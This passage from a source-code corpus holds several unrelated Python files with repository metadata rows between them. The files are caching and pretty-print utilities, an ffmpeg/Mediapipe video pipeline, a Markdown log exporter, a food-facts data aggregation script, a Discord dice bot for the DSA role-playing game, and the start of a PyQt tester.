    cache_dir = os.path.join(os.environ.get("HOME"), "var", "edflow_cached_func")
    os.makedirs(cache_dir, exist_ok=True)

    def wrapped(*args, **kwargs):
        callargs = (args, kwargs)
        # Content hash of the pickled call arguments, prefixed with the
        # function name to separate caches of different functions.
        callhash = hashlib.sha1(pickle.dumps(callargs)).hexdigest()
        pfname = fn.__name__ + callhash + ".p"
        ppath = os.path.join(cache_dir, pfname)
        if not os.path.exists(ppath):
            # compute
            print("Computing {}".format(ppath))
            result = fn(*args, **kwargs)
            # and cache
            with open(ppath, "wb") as f:
                pickle.dump(result, f)
            print("Cached {}".format(ppath))
        else:
            # load from cache
            with open(ppath, "rb") as f:
                result = pickle.load(f)
        return result

    return wrapped
class PRNGMixin(object):
    """Adds a ``prng`` property holding a numpy RandomState that is
    re-created whenever the process id changes, so forked workers
    (e.g. under multiprocessing) do not share identical random streams."""

    @property
    def prng(self):
        pid = os.getpid()
        # A pid change means we are in a freshly forked process: discard
        # the inherited RandomState and seed a new one.
        if getattr(self, "_initpid", None) != pid:
            self._initpid = pid
            self._prng = np.random.RandomState()
        return self._prng
class Printer(object):
    """For usage with walk: accumulates one line of text per visited leaf."""

    def __init__(self, string_fn):
        # string_fn maps (key, obj) to the line to record.
        self.str = ""
        self.string_fn = string_fn

    def __call__(self, key, obj):
        line = self.string_fn(key, obj)
        self.str = self.str + line + "\n"

    def __str__(self):
        return self.str
class TablePrinter(object):
    """For usage with walk: collects rows and renders them as an ASCII table.

    Args:
        string_fn (Callable): Maps ``(key, obj)`` to an iterable of cell
            strings (one table row).
        names (list, optional): Column headers; when given, a header row
            followed by a heavy (``=``) separator is rendered first.

    Bug fix: ``__str__`` contained a leftover debug ``print(crossings)``
    that wrote to stdout every time the table was rendered; removed.
    """

    def __init__(self, string_fn, names=None):
        if names is None:
            self.vals = []
            self.has_header = False
        else:
            self.vals = [names]
            self.has_header = True
        self.string_fn = string_fn

    def __call__(self, key, obj):
        self.vals += [list(self.string_fn(key, obj))]

    def __str__(self):
        # Column widths: widest entry per column plus two padding chars.
        col_widths = [0] * len(self.vals[0])
        for val in self.vals:
            for i, entry in enumerate(val):
                col_widths[i] = max(col_widths[i], len(entry) + 2)

        # Row format string: "| {: >w} | {: >w} | ... |\n"
        form = "|"
        for cw in col_widths:
            form += " {: >" + str(cw) + "} |"
        form += "\n"

        # Build separator lines with "+" at every column crossing.
        ref_line = form.format(*self.vals[0])
        sep = "-" * (len(ref_line) - 1)
        hsep = "=" * (len(ref_line) - 1)
        chars = np.array(list(ref_line))
        crossings = np.where(chars == "|")[0]
        for c in crossings:
            sep = sep[:c] + "+" + sep[c + 1 :]
            hsep = hsep[:c] + "+" + hsep[c + 1 :]
        sep += "\n"
        hsep += "\n"

        table_str = sep
        for i, val in enumerate(self.vals):
            table_str += form.format(*val)
            if self.has_header and i == 0:
                table_str += hsep
            else:
                table_str += sep
        return table_str
def pprint_str(nested_thing, heuristics=None):
    """Format a nested object as a string, one line per leaf.

    Args:
        nested_thing (dict or list): Some nested object.
        heuristics (Callable): If given, maps ``(key, obj)`` to the line
            printed for that leaf; defaults to showing type and value
            (shape for numpy arrays).
    """
    if heuristics is None:

        def heuristics(key, obj):
            if isinstance(obj, np.ndarray):
                return "{}: np array - {}".format(key, obj.shape)
            return "{}: {} - {}".format(key, type(obj), obj)

    printer = Printer(heuristics)
    walk(nested_thing, printer, pass_key=True)
    return str(printer)
def pprint(nested_thing, heuristics=None):
    """Print a nested object, one line per leaf.

    Args:
        nested_thing (dict or list): Some nested object.
        heuristics (Callable): If given, maps ``(key, obj)`` to the line
            printed for that leaf.
    """
    formatted = pprint_str(nested_thing, heuristics)
    print(formatted)
def pp2mkdtable(nested_thing):
    """Render a nested object as an ASCII/markdown-style table string with
    Name/Type/Content columns, one row per leaf."""

    def heuristics(key, obj):
        cls_name = str(obj.__class__.__name__)
        if hasattr(obj, "shape"):
            # Arrays/tensors: show the shape, except for scalars.
            shown = str(obj) if obj.shape == () else str(obj.shape)
            return key, cls_name, shown
        if hasattr(obj, "size"):
            return key, cls_name, str(obj.size())
        return key, cls_name, str(obj)

    printer = TablePrinter(heuristics, names=["Name", "Type", "Content"])
    walk(nested_thing, printer, pass_key=True)
    return str(printer)
if __name__ == "__main__":
    # Demo: walk a nested structure, negate every numeric leaf, and show
    # the pretty-printing helpers.
    from edflow.data.util import plot_datum

    image = np.ones([100, 100, 3])

    nested = {
        "step": 1,
        "stuff": {"a": 1, "b": [1, 2, 3]},
        "more": [{"c": 1}, 2, [3, 4]],
        "image": image,
    }

    def fn(val):
        # Print each leaf as it is visited, then return its negation.
        print(val)
        return -val

    # Non-inplace walk: `nested` stays unchanged, `new` holds negated leaves.
    new = walk(nested, fn)

    print(nested)
    print(new)

    pprint(nested)
    print(pp2mkdtable(nested))

    plot_datum(nested)
| 29.212707 | 85 | 0.564728 | 1,389 | 10,575 | 4.161987 | 0.226062 | 0.01972 | 0.032866 | 0.009687 | 0.236291 | 0.17644 | 0.136309 | 0.136309 | 0.11434 | 0.111399 | 0 | 0.008144 | 0.314894 | 10,575 | 361 | 86 | 29.293629 | 0.789786 | 0.317069 | 0 | 0.180412 | 0 | 0 | 0.030792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113402 | false | 0.046392 | 0.020619 | 0.005155 | 0.268041 | 0.061856 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf84b8c96e2bdd65eb5bb3c0dbead6d4d0544cd5 | 2,459 | py | Python | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 19 | 2021-09-13T21:29:58.000Z | 2022-03-01T13:44:23.000Z | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 44 | 2021-09-13T15:27:46.000Z | 2022-01-18T13:13:09.000Z | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 10 | 2021-09-15T16:15:46.000Z | 2022-01-21T01:14:54.000Z | #!/usr/bin/python
import argparse
import subprocess
class MediaMetadata:
    """Width, height and frame rate of a video/image file."""

    def __init__(self, width, height, framerate):
        self.width = width
        self.height = height
        self.framerate = framerate

    @staticmethod
    def from_filepath(filepath):
        """Probe *filepath* with ffprobe and return a MediaMetadata.

        Requires ``ffprobe`` on PATH. (Declared as a staticmethod — the
        original had no decorator and no ``self``, so it only worked when
        called through the class.)
        """
        output = subprocess.check_output([
            "ffprobe", "-v", "0",
            "-select_streams", "v:0",
            "-show_entries", "stream=width,height,r_frame_rate",
            "-of", "default=noprint_wrappers=1", filepath
        ]).decode('ascii').splitlines()
        # Lines look like "width=1920"; keep only the values.
        [warr, harr, farr] = [l.split('=')[1] for l in output]
        width = int(warr)
        height = int(harr)
        # r_frame_rate is a fraction such as "30000/1001".
        [nfarr, dfarr] = farr.split('/')
        framerate = int(nfarr) / int(dfarr)
        return MediaMetadata(width, height, framerate)
# --- Command line -----------------------------------------------------------
parser = argparse.ArgumentParser(
    prog='track.py',
    description='Pipe a video or image into Mediapipe to track something.',
    epilog='Dame da ne, dame yo, dame na no yo...')
parser.add_argument('media',
                    help='The media to feed into a Medapipe graph.')
parser.add_argument('-g', '--graph',
                    default='mediapipe/graphs/face_mesh/face_mesh_desktop_live.pbtxt',
                    help='The Mediapipe graph to feed some media to.')
parser.add_argument('-o', '--output',
                    default='bin/video-out.mp4',
                    help='Where to put the output file.')
args = parser.parse_args()

# Probe the input so all raw-video pipe stages agree on frame geometry/rate.
mm = MediaMetadata.from_filepath(args.media)

# Equivalent shell pipeline:
# ffmpeg -hide_banner -an -i $video_in -pix_fmt rgba -f rawvideo - 2>/dev/null \
#     | bin/Debug/net5.0/Akihabara.Examples.OnRawIO $sw $sh mediapipe/graphs/face_mesh/face_mesh_desktop_live.pbtxt \
#     | ffmpeg -vn -i $video_in -y -hide_banner -pix_fmt rgba -f rawvideo -s ${sw}x${sh} -r $fps -i - -pix_fmt yuv420p $video_out

# Stage 1: decode the media to raw RGBA frames on stdout (audio dropped).
p_decode = subprocess.Popen([
    "ffmpeg", "-hide_banner",
    "-an", "-i", args.media,
    "-pix_fmt", "rgba", "-f", "rawvideo", "-"
], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)

# Stage 2: run the raw frames through the Mediapipe graph runner.
p_track = subprocess.Popen([
    "bin/Debug/net5.0/Akihabara.Examples.OnRawIO",
    str(mm.width), str(mm.height), args.graph
], stdin=p_decode.stdout, stdout=subprocess.PIPE)
# Close our copy so p_decode sees a broken pipe if p_track exits early.
p_decode.stdout.close()

# Stage 3: re-encode the processed raw frames to the output file. The input
# file is opened again with video disabled (-vn) — presumably to carry over
# its audio/metadata; confirm against the ffmpeg invocation semantics.
p_encode = subprocess.Popen([
    "ffmpeg", "-hide_banner", "-y",
    "-vn", "-i", args.media,
    "-pix_fmt", "rgba", "-f", "rawvideo", "-s", f"{mm.width}x{mm.height}", "-r", str(mm.framerate), "-i", "-",
    "-pix_fmt", "yuv420p", args.output
], stdin=p_track.stdout)
p_track.stdout.close()

# Wait for all pipeline stages to finish.
p_decode.wait()
p_track.wait()
p_encode.wait()
| 33.22973 | 125 | 0.646198 | 338 | 2,459 | 4.56213 | 0.387574 | 0.023346 | 0.02594 | 0.028534 | 0.226329 | 0.160182 | 0.146563 | 0.098573 | 0.06096 | 0 | 0 | 0.007948 | 0.181375 | 2,459 | 73 | 126 | 33.684932 | 0.758073 | 0.134608 | 0 | 0 | 0 | 0 | 0.281073 | 0.083804 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.111111 | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf85e87ae27dbc7518de916f0330cd2331da96f8 | 1,698 | py | Python | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 32 | 2016-08-27T01:31:42.000Z | 2022-03-21T08:59:28.000Z | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 3 | 2016-08-27T00:51:47.000Z | 2019-08-26T13:23:04.000Z | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 10 | 2016-08-28T14:14:41.000Z | 2021-03-18T03:24:22.000Z | #!/usr/bin/env python
#-*- coding: utf-8 -*-
##---------------------------------------------------------------------------------------
#
# Markdown
# fiction: includes only fiction blocks
# yml: uses a yaml Front Matter from config.txt
# pdf: is ready to convert to pdf (or latex) via pandoc
#
##---------------------------------------------------------------------------------------
import imports
from imports import *
import config
def exclude():
    """Always return False."""
    return False
def makeLogFile(self):
    """Write the fiction-only log as pandoc-ready Markdown with a YAML
    front matter, to ``logs/fiction_yml_pdf.md`` in the current game dir.

    Collects source lines whose status marks them as fiction and converts
    the [i]/[b] markup into LaTeX commands.
    """
    logfile = config.curr_game_dir + "logs" + os.sep + "fiction_yml_pdf.md"
    textArray, textStatusArray = getSourceMaterial()
    YAML = config.yaml_for_pdf
    fictionStatusList = ["plain", "italic", "bold", "bold_italic", "color1", "color2"]

    # [i]/[b] tag -> LaTeX mappings; combined tags must come first so they
    # are not partially consumed by the single-tag rules. Hoisted out of
    # the loop (they are constant).
    prefix_escapes = [['[i][b]', '\\textit{\\textbf{'], ['[b][i]', '\\textbf{\\textit{'], ['[i]', '\\textit{'], ['[b]', '\\textbf{']]
    suffix_escapes = [['[/i][/b]', '}}'], ['[/b][/i]', '}}'], ['[/i]', '}'], ['[/b]', '}']]

    result = ""
    # enumerate fixes the old list.index() lookup, which returned the
    # status of the *first* matching line whenever the text contained
    # duplicate lines.
    for ti, item in enumerate(textArray):
        item = item.rstrip()
        if textStatusArray[ti] in fictionStatusList:
            result = result + "\n"
            for esc in prefix_escapes:
                if esc[0] in item:
                    item = item.replace(esc[0], esc[1] + "\plain{")
            for esc in suffix_escapes:
                if esc[0] in item:
                    item = item.replace(esc[0], "}" + esc[1])
            result = result + "\n" + item

    result = YAML + parseMarkup(result)
    result = result.lstrip()
    # Open in binary mode: the old code wrote encoded bytes to a text-mode
    # handle, which raises TypeError on Python 3. "wb" + encode works on
    # both Python 2 and 3.
    with open(logfile, "wb") as log_file:
        log_file.write(result.encode('utf-8'))
bf89b25245266126dba56862b20f23c850ea62d7 | 2,397 | py | Python | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | import pandas as pd
import json
# Raw tab-separated exports of the food-facts data set.
countries = pd.read_csv('tsv/products_countries.tsv', sep='\t')
categories = pd.read_csv('tsv/products_categories_full.tsv', sep='\t')
products = pd.read_csv('tsv/products.tsv', sep='\t')
# Join products with their categories and countries on the shared 'code' column.
combined = pd.merge(left = products, right = categories, on='code' )
combined = pd.merge(left=combined, right=countries, on='code')
def get_top_countries(df, food_type, top=10):
    """Return the names of the `top` countries with the highest total `food_type`."""
    totals = df.groupby('country')[food_type].sum()
    ranked = totals.sort_values(ascending=False)
    return list(ranked.index)[:top]
def get_top_values(df, food_type, top=10):
    """Return the `top` highest per-country totals of `food_type`, descending."""
    totals = df.groupby('country')[food_type].sum()
    ranked = totals.sort_values(ascending=False)
    return list(ranked)[:top]
def get_ingredient_data(data, ing):
    """Total `ing` per (country, category) pair, sorted by the ingredient, descending.

    Returns a DataFrame indexed by the (country, category) MultiIndex with a
    single `ing` column.

    Fixes two defects: the `data` parameter was ignored in favour of the
    module-level `combined`, and the deprecated multi-label groupby selection
    `groupby(...)[ing, 'category', 'country']` was removed in modern pandas.
    """
    grouped = data.groupby(['country', 'category'])[[ing]].sum()
    return grouped.sort_values(by=ing, ascending=False)
def get_plot_format_data(combined, ing, blue):
    """Shape the per-country / per-category totals for the d3 plot.

    `blue` is the frame produced by get_ingredient_data(): its index is
    assumed to be (country, category) tuples with an `ing` column —
    TODO confirm against the caller.  For each of the top countries, up to
    7 categories are collected and emitted as
    {"State": country, "total": ..., "freq": {cat1: value, ...},
     "legend": {cat1: truncated category name, ...}}.
    """
    country_list = get_top_countries(combined, ing)
    value_list = get_top_values(combined, ing)
    #print(value_list)
    details={}
    for country in country_list:
        if country not in details.keys():
            details[country]=[]
        # Scan the ranked (country, category) index; it is already sorted by
        # value, so the first 7 hits are that country's biggest categories.
        for value in blue.index:
            if country == value[0]:
                if len(details[country])<7:
                    details[country].append({value[1]:blue.loc[value][ing]})
    result =[]
    counter = 0
    for key, value in details.items():
        freq_dict ={}
        legend={}
        # Re-key the categories as cat1..catN; the legend maps them back to
        # (shortened) category names.
        for i, dt in enumerate(value):
            name = 'cat'+str(i+1)
            for x in list(dt.keys()):
                legend[name] = truncate_long_cats(x)
                freq_dict[name] = list(dt.values())[0]
        #print(value_list[counter])
        # value_list is ordered the same way as country_list, so counter
        # pairs each country with its total.
        result.append({"State": key, 'total':value_list[counter], "freq":freq_dict , "legend": legend})
        counter+=1
    return result
def truncate_long_cats(cats):
    """Shorten a dashed category name to at most 15 characters.

    Names with more than two dash-separated segments keep only the first and
    last segment joined by '...'.
    """
    segments = cats.split("-")
    if len(segments) > 2:
        shortened = segments[0] + "..." + segments[-1]
    else:
        shortened = "-".join(segments)
    return shortened[:15]
# Ingredients (per-100g columns) to aggregate for the visualization.
ingredients = ['alcohol_100g', 'sugars_100g', 'salt_100g', 'cholesterol_100g', 'fruits-vegetables-nuts_100g']
final = {}
for ing in ingredients:
    # Rank (country, category) pairs by this ingredient, then reshape for d3.
    blue = get_ingredient_data(combined, ing)
    data = get_plot_format_data(combined,ing, blue)
    # Key the output by the short name, e.g. 'alcohol_100g' -> 'alcohol'.
    final[ing.split('_')[0]]= data
# Save the combined result for the front end.
with open('final2.json','w') as f:
    json.dump(final, f)
| 29.231707 | 122 | 0.622445 | 326 | 2,397 | 4.423313 | 0.322086 | 0.038141 | 0.018724 | 0.024965 | 0.191401 | 0.149792 | 0.149792 | 0.105409 | 0.105409 | 0.105409 | 0 | 0.017666 | 0.220693 | 2,397 | 81 | 123 | 29.592593 | 0.754283 | 0.035878 | 0 | 0 | 0 | 0 | 0.107499 | 0.036844 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.037736 | 0.056604 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf8a442f7555ff5867a989ed32bf9d07c2238f69 | 10,207 | py | Python | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | null | null | null | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | 1 | 2020-11-09T23:29:15.000Z | 2020-11-09T23:29:15.000Z | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | null | null | null | import discord
import queue
import db
import disc_api
import glob_vars
import time, threading
import dice
import helper
import logging
import re
stats = ["mu","kl","in","ch","ff","ge", "ko", "kk"] #careful: in is int in the db!
def is_int(s):
    """Return True when `s` can be parsed as a base-10 integer."""
    try:
        int(s)
    except ValueError:
        return False
    return True
def received_msg(message):
    """Entry point for a message pulled off the queue; hands it to the parser."""
    parse_msg(message)
def parse_attribute_input(s):
    """Parse an attribute token.

    Returns (name, dep1, dep2, dep3) for the full 'name(a,b,c)' form,
    (name, '', '', '') for a bare name, or None when neither form matches.
    """
    full_form = re.match(r'\A[a-zA-Z]+\([a-zA-Z]+,[a-zA-Z]+,[a-zA-Z]+\)\Z', s)
    if full_form:
        name = re.search(r'([a-zA-Z]*?)\(', s).group(1)
        deps = re.search(r'\((.*?)\)', s).group(1).split(',')
        return (name, deps[0], deps[1], deps[2])
    if re.match(r'\A[a-zA-Z | - | _]+\Z', s):
        return (s, "", "", "")
    return None
def send_message(channel, content):
    """Send `content` to `channel`, split into chunks of at most 1600 chars.

    A short pause between chunks keeps the sender from flooding the channel.
    """
    chunk_size = 1600
    for start in range(0, len(content), chunk_size):
        glob_vars.send_message(channel, content[start:start + chunk_size])
        time.sleep(0.1)
def command_register(message, args):
    """Create a new character named args[0] for the author, enforcing the per-user limit."""
    if(len(args) < 1):
        send_message(message.channel, "Too few arguments!")
        return
    charname = args[0]
    charNumber = len(db.db_get_char_list(message.author))
    # Cap the number of characters each user may own.
    if charNumber >= glob_vars.MAX_CHAR_COUNT:
        send_message(message.channel, "You have too many characters!\nYou can delete one by using the 'delete' command")
        return
    # db_register_char returns a user-facing status string.
    success = db.db_register_char(message.author, charname)
    send_message(message.channel,success)
def command_chars(message):
    """List the author's characters, marking the currently selected one with '=>'."""
    chars = db.db_get_char_list(message.author)
    selected = db.get_selected_char(message.author)
    res = ""
    for char in chars:
        if char == selected:
            res +="=>"
        res = res + char.capitalize() + "\n"
    if res == "":
        res = "No chars in database!"
    msg = "You currently have "+ str(len(chars))+"/"+str(glob_vars.MAX_CHAR_COUNT) +" char(s)! \n\n"
    send_message(message.channel,msg + res)
def command_char(message, args):
    """Print a character sheet: the 8 base stats plus all custom attributes.

    Uses args[0] as the character name, falling back to the author's
    currently selected character.
    """
    charname = ""
    selected_char = db.get_selected_char(message.author)
    if selected_char == None:
        send_message(message.channel, "User has no character!")
        return
    if len(args) < 1:
        charname = selected_char
    else:
        charname = args[0]
    if not db.check_char_exists(message.author, charname):
        send_message(message.channel, "This character could not be found in the database!")
        return
    charEntry, attributeList = db.db_get_char(charname, message.author)
    charEntry = charEntry[0]
    # Collect the eight base stats, zero-padded to two digits for the table.
    stat = []
    for s in glob_vars.stats:
        stat.append(helper.make_str_two_digits(str(helper.attribute_value_from_list(attributeList, s))))
    header = "-------------**"+ charname.capitalize() +"**-----------------"
    toprow = "| mu | kl | in | ch | ff | ge | ko | kk |"
    botrow = "| " +stat[0] +" | " +stat[1]+" | " +stat[2]+" | " +stat[3]+" | " +stat[4]+" | " +stat[5]+" | " +stat[6]+" | " +stat[7]+" |\n\n"
    attributes_print = "**Attributes** ("+ str(db.get_attribute_number(charname, message.author))+"/"+ str(glob_vars.MAX_ATTRIBUTE_COUNT) +"): \n"
    # Everything that is not a base stat is a custom attribute; attribute rows
    # look like (name, value, dep1, dep2, dep3) — deps are printed when present.
    for attribute in filter(lambda x: not x[0] in glob_vars.stats, attributeList):
        dependency_print = ""
        if not attribute[2] == "":
            dependency_print = "("+attribute[2]+","+attribute[3]+","+attribute[4]+")"
        attributes_print += str(attribute[0]) + dependency_print+" " + str(attribute[1]) + "\n"
    send_message(message.channel, header+"\n"+toprow+"\n"+botrow+ attributes_print)
def command_delete(message, args):
    """Delete the character named in args[0] from the author's roster."""
    if not args:
        send_message(message.channel, "too few arguments!")
        return
    outcome = db.db_remove_char(args[0], message.author)
    send_message(message.channel, outcome)
def command_update(message, args):
    """Set attribute values on the selected character.

    args alternate attribute / value: `update mu 12 kl 10 ...`; an attribute
    may carry a dependency triple, e.g. `swim(mu,ge,kk) 7`.
    """
    out = ""
    if not db.check_user_has_char(message.author):
        send_message(message.channel, "User has no character!")
        return
    # Step through the even indices: each attribute is followed by its value.
    for i in range(len(args))[::2]:
        s = parse_attribute_input(args[i])
        if s == None:
            send_message(message.channel, "Oops, wrong arguments for " + args[i])
            return
        if i+1 < len(args):
            if not is_int(args[i+1]):
                out += "arg for **"+ s[0] +"** has to be an integer!\n"
                continue
            attributeValue = int(args[i+1])
            out += db.db_update_attribute(message.author, s, attributeValue) + "\n"#first param is "attribute"
        else:
            # Dangling attribute without a value at the end of the list.
            send_message(message.channel, "Oops, too few arguments for " + s[0])
            return
    send_message(message.channel, out)
def command_selected(message):
    """Report which of the author's characters is currently selected."""
    current = db.get_selected_char(message.author)
    if current is None:
        send_message(message.channel, "User has no character!")
    else:
        send_message(message.channel, "Selected char for user " + str(message.author) + ": " + current)
def command_select(message, args):
    """Make args[0] the author's active character."""
    if not args:
        send_message(message.channel, "too few arguments!")
        return
    outcome = db.db_select_char(message.author, args[0])
    send_message(message.channel, outcome)
def command_roll(message, s, args):
    """Roll dice: strips the 'roll'/'r' command word and passes the rest to the dice parser."""
    s = helper.remove_prefix(s, "roll")
    s = helper.remove_prefix(s, "r")
    if(len(args) < 1):
        s = "w20"  # no dice spec given: default to a single W20 (German d20)
    res = dice.simulate_dice(s)
    send_message(message.channel, res)
def command_rd(message, args):
    """Perform a DSA skill check against three stats (plus an optional talent).

    With a single argument, the argument names a stored attribute whose three
    dependency stats are looked up from the database and substituted in.
    """
    if len(args) != 3 and len(args) != 4 and len(args) != 1:
        send_message(message.channel, "Wrong syntax!\n/rd <stat> <stat> <stat> <talent - optional>")
        return
    if not db.check_user_has_char(message.author):
        send_message(message.channel, "User has no character!")
        return
    cID = db.get_selected_char(message.author)
    charEntry = db.db_get_char(cID, message.author)
    if len(args) == 1:
        # Attribute-based roll: expand the attribute into its three stats
        # plus its own value as the talent.
        attribute = db.get_attribute(cID,message.author, args[0])
        if attribute == None:
            send_message(message.channel, "Oops, this attribute was not found on **"+cID +"**" )
            return
        # attribute row layout per usage here: [2]=value, [4..6]=dependency stats.
        if(attribute[6] == "" or attribute[4] == "" or attribute[5] == "" ):
            send_message(message.channel, "Oops, **"+attribute[2]+"** has no dependencies at the moment!" )
            return
        args[0] = attribute[4]
        args.append(attribute[5])
        args.append(attribute[6])
        args.append(attribute[2])
    res = dice.roll_dsa(args, charEntry)
    send_message(message.channel, res)
def command_set_prefix(message, args):
    """Change the command prefix for this server (guild)."""
    if not args:
        send_message(message.channel, "too few arguments!")
        return
    outcome = db.db_set_prefix(message.guild, args[0])
    send_message(message.channel, outcome)
def command_remove(message, args):
    """Delete custom attributes from the selected character; base stats are protected."""
    selected = db.get_selected_char(message.author)
    if selected == None:
        send_message(message.channel, "User has no character selected!")
        return
    out = ""
    for arg in args:
        # The eight base stats can never be removed.
        if arg not in glob_vars.stats:
            out += db.db_remove_attribute(selected, message.author, arg) + "\n"
    send_message(message.channel, out)
def command_rename(message, args):#FIX DATABASE FIRST!!
    """Rename a character. Deliberately disabled: the early return below makes everything after it dead code."""
    send_message(message.channel, "This function is not available because my database has been set up very poorly!")
    return
    # --- dead code until the DB schema is fixed ---
    # NOTE(review): when re-enabling, the "Too few arguments!" branch is
    # missing a `return`, so it would fall through to args[0]/args[1].
    if len(args) < 2:
        send_message(message.channel, "Too few arguments!")
    currentName = args[0]
    newName = args[1]
    if not db.check_char_exists(message.author, currentName):
        send_message(message.channel, currentName + " could not be found!")
        return
    if db.check_char_exists(message.author, newName):
        send_message(message.channel, newName + " is already in use by one of your characters!")
        return
    success = db.db_rename_character(currentName, message.author, newName)
    send_message(message.channel, success)
def command_help(message, args):
    """Send the static help text (args are ignored)."""
    send_message(message.channel, glob_vars.HELP_MESSAGE)
def parse_msg(message):
    """Dispatch an incoming Discord message to its command handler.

    The startswith() chain is order-sensitive: longer / more specific command
    words must be tested before shorter prefixes they contain ('chars' before
    'char', 'selected' before 'select', and 'register'/'remove'/'rename'/'rd '
    before the catch-all 'r' used for dice rolls).
    """
    prefix = db.db_get_prefix(message.guild)
    # "prefix" (without the prefix) always answers, so users can discover it.
    if str(message.content) == "prefix":
        send_message(message.channel, "The prefix for this server is: "+ prefix)
        return
    if not message.content.startswith(prefix):
        return
    s = message.content.lower()
    s = helper.remove_prefix(s, prefix)
    args = s.split()[1:]
    #send_message( message.channel, "parsing .. \"" + message.content + "\" ...") # debug message
    if(s.startswith("register")): #/register <charname>
        command_register(message, args)
    elif(s.startswith("chars")): #/chars
        command_chars(message)
    elif(s.startswith("char")): #/char <charname - optional>
        command_char(message, args)
    elif(s.startswith("delete")):#/delete <charname>
        command_delete(message, args)
    elif(s.startswith("remove")):
        command_remove(message, args)
    elif(s.startswith("update")):#/update in <int> ch <y> ...
        command_update(message, args)
    elif(s.startswith("selected")):
        command_selected(message)
    elif(s.startswith("select")):#/select <charname>
        command_select(message,args)
    elif(s.startswith("rename")):#FIX DATABASE FIRST!!
        # BUG FIX: this test previously came AFTER the generic "r" branch,
        # so "<prefix>rename ..." rolled dice and command_rename was unreachable.
        command_rename(message, args)
    elif(s.startswith("rd ")):
        command_rd(message, args)
    elif(s.startswith("r")):
        command_roll(message,s ,args)
    elif(s.startswith("prefix")):
        command_set_prefix(message, args)
    elif(s.startswith("help")):
        command_help(message, args)
def check_queue():
    """Drain at most one message from the inter-thread queue.

    A message whose content is "exit" sets the terminate flag (the message is
    still forwarded to the normal handler afterwards).
    """
    try:
        # Non-blocking get: raises queue.Empty when nothing is waiting.
        send_item = glob_vars.bot_receive_queue.get(False)
        if send_item.content == "exit":
            glob_vars.terminate = True
        received_msg(send_item)
    except queue.Empty:
        send_item = None
def start_bot():
    """Worker-thread main loop: initialise the DB, then poll the inbound queue until terminated."""
    logging.info("Started bot!")
    db.init_db()
    # 50 ms poll interval keeps latency low without busy-waiting.
    while(not glob_vars.terminate):
        time.sleep(0.05)
        check_queue()
# Log to log.txt, appending across runs.
logging.basicConfig(level=logging.INFO, filename="log.txt", filemode="a+",
                    format="%(asctime)-15s %(levelname)-8s %(message)s")
# Run the queue-polling bot loop on a worker thread while the Discord API
# client owns the calling thread.
x = threading.Thread(target=start_bot)
x.start()
disc_api.start_api()
bf8c232211d8a9e8eb6f6025337e301b97fed78a | 12,943 | py | Python | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | import argparse
import asyncio
import random
import signal
import sys
import time
import traceback
import yaml
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtNetwork import *
from PyQt5.QtWidgets import *
from b4 import *
class B4:
    """Process-wide shared state for the tester (config, test groups, transports)."""
    conf = dict()    # parsed t.yml configuration
    groups = dict()  # group_name -> {'pass': ..., 'rooms': {...}}
    # 's' plus the room names '1'..'3'; b4.room_names[1:] iterates the rooms.
    room_names = 's123'
    def __init__(self):
        pass

b4 = B4()
def scene_add(scene, tick, kind, role, action):
